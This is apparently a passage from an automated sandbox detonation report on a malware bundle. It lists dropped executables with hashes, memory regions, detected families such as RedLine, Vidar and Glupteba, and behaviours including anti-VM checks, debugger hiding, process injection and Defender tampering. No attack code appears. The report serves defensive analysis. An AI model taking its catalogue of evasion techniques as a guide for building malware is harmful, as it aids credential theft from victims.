| SHA512 | f6b9ac777f9b357b4da4f5653f562631b55514516eb20c2fda63d85d15ed5d572e14887e5f0a10ebdc494188d2da3af7d53171159ef303719f12def0a4f8f5db |
memory/3748-220-0x00000000009C0000-0x00000000009C1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-13CSK.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp
| MD5 | ffcf263a020aa7794015af0edee5df0b |
| SHA1 | bce1eb5f0efb2c83f416b1782ea07c776666fdab |
| SHA256 | 1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64 |
| SHA512 | 49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a |
memory/2500-215-0x0000000002EE0000-0x0000000002EEA000-memory.dmp
memory/4664-210-0x000000001B430000-0x000000001B432000-memory.dmp
memory/4540-208-0x0000000005A30000-0x0000000005A31000-memory.dmp
memory/668-221-0x00000000023D0000-0x0000000002446000-memory.dmp
memory/4540-222-0x0000000005650000-0x0000000005651000-memory.dmp
memory/2972-224-0x0000000000730000-0x0000000000731000-memory.dmp
memory/1068-207-0x0000000000000000-mapping.dmp
memory/2292-206-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe
| MD5 | b019efc4814c7a73b1413a335be1fa13 |
| SHA1 | 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2 |
| SHA256 | a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e |
| SHA512 | d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b |
memory/2016-200-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe
| MD5 | b019efc4814c7a73b1413a335be1fa13 |
| SHA1 | 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2 |
| SHA256 | a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e |
| SHA512 | d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b |
memory/4816-201-0x0000028EDC6E0000-0x0000028EDC841000-memory.dmp
C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe
| MD5 | 58f5dca577a49a38ea439b3dc7b5f8d6 |
| SHA1 | 175dc7a597935b1afeb8705bd3d7a556649b06cf |
| SHA256 | 857dd46102aea53f0cb7934b96410ebbc3e7988d38dcafdc8c0988f436533b98 |
| SHA512 | 3c75c0cbbbc14bd25b4feb141fd1595ce02469da50432fb48400eb089d6150fe87831ccc775d921eeec697af7aad33a35fadcfd2ec775aeee1ce34355af7338a |
memory/1716-195-0x0000000000000000-mapping.dmp
memory/2292-227-0x00000000031D0000-0x000000000320C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\itdownload.dll
| MD5 | d82a429efd885ca0f324dd92afb6b7b8 |
| SHA1 | 86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea |
| SHA256 | b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3 |
| SHA512 | 5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df |
C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\itdownload.dll
| MD5 | d82a429efd885ca0f324dd92afb6b7b8 |
| SHA1 | 86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea |
| SHA256 | b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3 |
| SHA512 | 5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df |
memory/4540-230-0x0000000005470000-0x0000000005471000-memory.dmp
memory/4540-232-0x00000000062E0000-0x00000000062E1000-memory.dmp
memory/4540-236-0x0000000005750000-0x0000000005751000-memory.dmp
memory/2292-240-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/668-238-0x00000000050A0000-0x00000000050A1000-memory.dmp
memory/1304-244-0x0000000004C80000-0x0000000004D86000-memory.dmp
memory/2292-235-0x0000000000630000-0x0000000000631000-memory.dmp
memory/4540-248-0x0000000005410000-0x0000000005A28000-memory.dmp
memory/3748-251-0x0000000005CE0000-0x0000000005CE1000-memory.dmp
memory/2292-256-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/2292-262-0x0000000005A80000-0x0000000005A81000-memory.dmp
memory/4540-260-0x00000000057C0000-0x00000000057C1000-memory.dmp
memory/2972-259-0x0000000005900000-0x0000000005901000-memory.dmp
memory/2292-253-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/2292-264-0x0000000005A90000-0x0000000005A91000-memory.dmp
memory/2292-265-0x0000000005AA0000-0x0000000005AA1000-memory.dmp
memory/2292-266-0x0000000005AB0000-0x0000000005AB1000-memory.dmp
memory/2292-269-0x0000000005AC0000-0x0000000005AC1000-memory.dmp
memory/1104-268-0x0000000000000000-mapping.dmp
memory/2292-271-0x0000000005AD0000-0x0000000005AD1000-memory.dmp
memory/2292-274-0x0000000005AE0000-0x0000000005AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\5335236.exe
| MD5 | 724252e8cc86d50db3dd965a744188c0 |
| SHA1 | 4f96e366267aa778d2f6b11bc35e5aca518a6c30 |
| SHA256 | 786bcc1e15c4c6c7a37ac4908c5991d5589b6d04c74070c0f083287fc74782ff |
| SHA512 | 3443a8230f77555e1c101a6b9a91d6695a45ff1cc5a503cb14ba0b87cefc8a58ab7e3d96df344f2df043fd285bc235e81dae51a8c6317d9262c519f945dd7a91 |
memory/2292-276-0x0000000005AF0000-0x0000000005AF1000-memory.dmp
memory/2012-275-0x0000000000000000-mapping.dmp
memory/2292-277-0x0000000005B00000-0x0000000005B01000-memory.dmp
C:\Users\Admin\AppData\Roaming\4750957.exe
| MD5 | 3598180fddc06dbd304b76627143b01d |
| SHA1 | 1d39b0dd8425359ed94e606cb04f9c5e49ed1899 |
| SHA256 | 44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda |
| SHA512 | 8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d |
C:\Users\Admin\AppData\Roaming\1156460.exe
| MD5 | 820b27e48dac554a246970c5dfefd5ce |
| SHA1 | 02c7a5d427d043f063e706933cfd993258a58c9c |
| SHA256 | 01e36e0ee266f5726c5e7d2eb01537cce145836e115c3629b7ca1f61fd2ee709 |
| SHA512 | 0c0fafb33829db45737ef0b552c3326bc11f199fdf789f528f3990ff8b61a55d83a8658689a30f3422cf02ffa488feea8252ca6a169a7d5f9a27e119846cff04 |
memory/2292-283-0x0000000005B10000-0x0000000005B11000-memory.dmp
memory/4632-282-0x0000000000000000-mapping.dmp
memory/1504-291-0x0000000000000000-mapping.dmp
memory/1104-289-0x000000001B230000-0x000000001B232000-memory.dmp
memory/2292-286-0x0000000005B20000-0x0000000005B21000-memory.dmp
memory/2012-285-0x0000000000CF0000-0x0000000000CF1000-memory.dmp
memory/1104-280-0x00000000005E0000-0x00000000005E1000-memory.dmp
memory/2292-290-0x0000000005B30000-0x0000000005B31000-memory.dmp
memory/2292-292-0x0000000005B40000-0x0000000005B41000-memory.dmp
C:\Users\Admin\AppData\Roaming\2857716.exe
| MD5 | f194d7ae32b3bb8d9cb2e568ea60e962 |
| SHA1 | 2e96571159c632c6782c4af0c598d838e856ae0b |
| SHA256 | 88184a929722705ecf5fd0631703e8b11f20a7a3145d2d94c18401cdb63d4221 |
| SHA512 | fbdc1c143d84f2fbbe688a3b26cf3258e127f99a56632f995e8e435c0143b71cfb8b45fd272ba8d40363908fb7b547fad55a289f449fc0bd568fc0c021044691 |
memory/2292-293-0x0000000005B50000-0x0000000005B51000-memory.dmp
memory/3028-298-0x00000000055B0000-0x00000000055B1000-memory.dmp
memory/2292-297-0x0000000005B60000-0x0000000005B61000-memory.dmp
memory/1104-296-0x00000000026B0000-0x00000000026FA000-memory.dmp
memory/1504-302-0x00000000008E0000-0x00000000008E1000-memory.dmp
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
| MD5 | 29903569f45cc9979551427cc5d9fd99 |
| SHA1 | 0487682dd1300b26cea9275a405c8ad3383a1583 |
| SHA256 | eec05dc9ade2a7ee74ea5fb115bdd687b457d1f81841238a61e9775d6cc4bfa6 |
| SHA512 | f8f29c163bfabc90ade4981523feb943656cc20a562e5b4f6f2c6788f781408aec39114a129e765332aa0022d154d4516e9cb56bc01762b114833fddb30d23fb |
memory/2012-309-0x0000000007CD0000-0x0000000007CD1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f6I3pBrbcTucpuiGuN7jQPmx.exe.log
| MD5 | e07da89fc7e325db9d25e845e27027a8 |
| SHA1 | 4b6a03bcdb46f325984cbbb6302ff79f33637e19 |
| SHA256 | 94ab73c00494d10a2159175b81e23047621451e3a566e5a0b1222379db634aaf |
| SHA512 | 1e33e34595ebb6ce129d0244199d29722c916c036da542c3001f84b10a964b96cec7a9fdd19e120d7840614b307b504be993a4f8538d54382aa4944575476dda |
memory/3908-301-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2012-300-0x0000000005480000-0x0000000005486000-memory.dmp
memory/3908-299-0x0000000000000000-mapping.dmp
memory/3100-318-0x0000000004A40000-0x0000000004A56000-memory.dmp
memory/3908-319-0x0000000005060000-0x0000000005678000-memory.dmp
memory/4684-335-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
| MD5 | 3598180fddc06dbd304b76627143b01d |
| SHA1 | 1d39b0dd8425359ed94e606cb04f9c5e49ed1899 |
| SHA256 | 44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda |
| SHA512 | 8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d |
memory/4988-345-0x0000000000000000-mapping.dmp
memory/1504-344-0x00000000052B0000-0x00000000052B1000-memory.dmp
memory/1436-341-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\sqlite.dll
| MD5 | 0523529d748d05f95f79cd0f1eb1a7d5 |
| SHA1 | aa1c131df28cfbe7b9f9d00b1b7c3d7ecd180cdc |
| SHA256 | f3c3df5ab554f66f9e1db49a510101166f6c285d2bca13a5d2b6dfba273dbc50 |
| SHA512 | 38efd52ad014d599799f1ffc79512e56a31305441d7b353f3e4a758bc9a0d7492a22883ee83d01f596ce5ad3a8f5175591f93f01cb726f45c4928148bcaa1d04 |
memory/576-349-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
| MD5 | 956c60ba7d7d44f04b4d9ae2db9f723e |
| SHA1 | 5b254193558cd413b015cd7efe7633e8712ffcb5 |
| SHA256 | 318ca6786488302f65aa4989d7be9b8ae25225ceef57894ef47e485153742170 |
| SHA512 | e5b10f641a8544f873ae23c37e0a7d850a0e59b012f0bf01d0a75382e3728436ff2c0077b8a61c71008ec44739fadedc5bdd1f33d052acf589dd944918fa1945 |
C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe
| MD5 | 145bf5658332302310a7fe40ed77783d |
| SHA1 | 5370ac46379b8db9d9fca84f21d411687109486f |
| SHA256 | bddcd5eba3036a21b11e6d6d3cbe84daf562db27814adf7e32b5cc103d3c25d3 |
| SHA512 | d3d9a8231f256efee7ce7ba6841d78c598dc912e7e5d503a9a094e6303d0f9f165a60c5370f353076b1f592d7d9ee6765d0ba4863a1c4935bb47e2ffa4ffb776 |
memory/4632-353-0x0000000005410000-0x0000000005411000-memory.dmp
memory/896-352-0x0000000000000000-mapping.dmp
memory/960-346-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe
| MD5 | b019efc4814c7a73b1413a335be1fa13 |
| SHA1 | 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2 |
| SHA256 | a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e |
| SHA512 | d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b |
memory/1020-360-0x0000000000000000-mapping.dmp
memory/2376-359-0x0000000000000000-mapping.dmp
memory/2568-358-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe
| MD5 | 161b975933aaae18920d241890000dac |
| SHA1 | 1cbbad54762c6301ad9ad2291159b9d2a141c143 |
| SHA256 | dcdb0bc5e91652e7e3d2269581275c18d8c5eabbde14f9c17c99e5ff49e54a83 |
| SHA512 | 758d1d206c887637d0727ba380d94d4cc1bb8a37cc705dbe62435a45c4ebb0ea111c9e9238261da64dd0d8ee5e27fd9851053dffa0359670a165973dd4f91443 |
memory/664-356-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\sqlite.dat
| MD5 | c78bf51ee294161707a6766e71cee582 |
| SHA1 | 3bb4ff0b06fc5b3753ab39f21e959895834bf7f8 |
| SHA256 | be449f187ec6ee4c4fa40642e698ffa3bfa19ec08848f4e0273b70427a1f1fc2 |
| SHA512 | b2d7d6d8c12b0dbdd677bc8acd764ab0687e976268e46f461b98c5cf941197785b5d5718d2e3a734eae49b0d358064ee23d9aae217af5f98da5252a8a11d531d |
memory/5084-368-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe
| MD5 | 6aa5e25e5c5fdfa19d40137e738792bd |
| SHA1 | 86f1485825d2f18fc5c03baca37cf5d6755801a8 |
| SHA256 | 504f42eb4afa952ce6178e5e09d9d75274005a1334f1cd965015e147c0d72160 |
| SHA512 | 5e101d4943d002e406495d5111f33b931b5c6db986c244d1fb209965de1e251b84f57683c2699002b41995d6a101d88076a2462404b63f07d584d25726294071 |
memory/3864-367-0x0000000000000000-mapping.dmp
memory/4160-366-0x0000000000000000-mapping.dmp
memory/4032-365-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe
| MD5 | 592404767648b0afc3cab6fade2fb7d2 |
| SHA1 | bab615526528b498a09d76decbf86691807e7822 |
| SHA256 | 3593247c384586966e5a0e28eb4c4174b31e93c78c7a9e8fef96ec42a152e509 |
| SHA512 | 83819e4956ac6da21c4927fa6edee2b178bc89bcda8fb5f4d0767d0d8310393f50f0f7e76e1a963002626a8176abfa8d864c9229a41e5b61e1a24a32d379dda9 |
C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe
| MD5 | 94c78c311f499024a9f97cfdbb073623 |
| SHA1 | 50e91d3eaa06d2183bf8c6c411947304421c5626 |
| SHA256 | 6aef62b3b8890bc22dd99f9b0d48247ae52c69e7ad9e384332658e73c725e40e |
| SHA512 | 29b61f1924f19d073460332950c2316acf769aa40ad7f62a41941160cd8a8da5958e8f96183e0e498afe8558fc3efb3a23f66c7519c142c780c91279ddecb545 |
memory/1148-371-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe
| MD5 | c7ccbd62c259a382501ff67408594011 |
| SHA1 | c1dca912e6c63e3730f261a3b4ba86dec0acd5f3 |
| SHA256 | 8cfa7e9bc6cbd458cec18a25e6f763a3776802490e6b3d451d864c4dba50c437 |
| SHA512 | 5f5958363820795f96fff6ad71bc1b59ec01a6a24876c5d22d48efaa49bc55373fca1f8e927c23547cdb494ba46b6d3871f377e607c97d9f10d4e0636ac7ef2b |
C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe
| MD5 | 7627ef162e039104d830924c3dbdab77 |
| SHA1 | e81996dc45106b349cb8c31eafbc2d353dc2f68b |
| SHA256 | 37896fe3568822c25970f8b4045e1504b21d7ddc54ccc9bbe85bf7f426f9b8a5 |
| SHA512 | 60501cac5e0b18c7d86624ef82f65696898dad5295f8bf28cd0e18a33e1c35d7efedf0ac7940e59b25367078dc85f7d8510ce765ce170da2613231485b923ae1 |
memory/4660-393-0x0000000000000000-mapping.dmp
memory/4364-394-0x0000000000000000-mapping.dmp
memory/4684-390-0x0000000004B80000-0x0000000004B81000-memory.dmp
memory/4988-397-0x0000000005730000-0x0000000005CD6000-memory.dmp
memory/2376-399-0x0000000002E90000-0x0000000002E99000-memory.dmp
memory/3776-400-0x0000000000000000-mapping.dmp
memory/4032-401-0x0000000004A00000-0x0000000004A2F000-memory.dmp
memory/5084-404-0x0000000005910000-0x0000000005911000-memory.dmp
memory/3120-403-0x0000000000000000-mapping.dmp
memory/5132-406-0x0000000000000000-mapping.dmp
memory/3120-407-0x00000000008E0000-0x00000000008E3000-memory.dmp
memory/5656-430-0x0000000000000000-mapping.dmp
memory/5572-428-0x0000000000000000-mapping.dmp
memory/5808-440-0x0000000000000000-mapping.dmp
memory/5512-450-0x0000000000000000-mapping.dmp
memory/664-451-0x0000000004150000-0x00000000041ED000-memory.dmp
memory/3776-459-0x000001E0A7180000-0x000001E0A71EE000-memory.dmp
memory/896-465-0x0000000005580000-0x0000000005581000-memory.dmp
memory/1020-477-0x0000000004080000-0x00000000040B0000-memory.dmp
memory/3776-481-0x000001E0A71F0000-0x000001E0A72BF000-memory.dmp
memory/960-473-0x0000000002600000-0x000000000262F000-memory.dmp
memory/3024-480-0x0000000000000000-mapping.dmp
memory/3864-488-0x00000000059F0000-0x00000000059F1000-memory.dmp
memory/4544-486-0x0000000000000000-mapping.dmp
memory/5512-510-0x0000000005540000-0x0000000005B58000-memory.dmp
memory/1440-518-0x0000000000000000-mapping.dmp
memory/72-524-0x0000000000000000-mapping.dmp
memory/2572-532-0x0000000000000000-mapping.dmp
memory/5656-537-0x0000000004920000-0x0000000004F38000-memory.dmp
memory/5964-535-0x0000000000000000-mapping.dmp
memory/5236-546-0x0000000000000000-mapping.dmp
memory/4544-549-0x0000000000000000-mapping.dmp
memory/2136-550-0x0000000000000000-mapping.dmp
memory/5080-552-0x0000000000000000-mapping.dmp
memory/5792-554-0x0000000000000000-mapping.dmp
memory/5588-556-0x0000000000000000-mapping.dmp
memory/4148-559-0x0000000000000000-mapping.dmp
memory/5456-561-0x0000000000000000-mapping.dmp
memory/4652-558-0x0000000000000000-mapping.dmp
memory/4160-557-0x0000000004930000-0x0000000005256000-memory.dmp
memory/5776-566-0x0000000000000000-mapping.dmp
memory/5472-569-0x0000000000000000-mapping.dmp
memory/4652-568-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5360-565-0x0000000000000000-mapping.dmp
memory/5776-572-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4148-570-0x000000001B120000-0x000000001B122000-memory.dmp
memory/5472-577-0x0000000003010000-0x0000000003011000-memory.dmp
memory/5080-579-0x0000000004940000-0x00000000049CF000-memory.dmp
memory/6084-575-0x00000000021B0000-0x00000000021B1000-memory.dmp
memory/4208-582-0x0000000000400000-0x000000000046D000-memory.dmp
memory/3928-586-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5780-584-0x0000000000700000-0x0000000000701000-memory.dmp
memory/5720-592-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4372-590-0x00000000020A0000-0x00000000020A1000-memory.dmp
memory/4372-594-0x0000000005910000-0x0000000005911000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2021-08-24 08:16
Reported
2021-08-24 08:46
Platform
win11
Max time kernel
91s
Max time network
265s
Command Line
Signatures
Glupteba
Glupteba Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Defender Real-time Protection settings
NetSupport
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4568 created 1736 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe |
| PID 4484 created 4000 | N/A | C:\Program Files\Windows Sidebar\JDVIQAUHIO\ultramediaburner.exe | C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe |
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-O602V.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-O602V.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3608 set thread context of 3368 | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\cmd.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
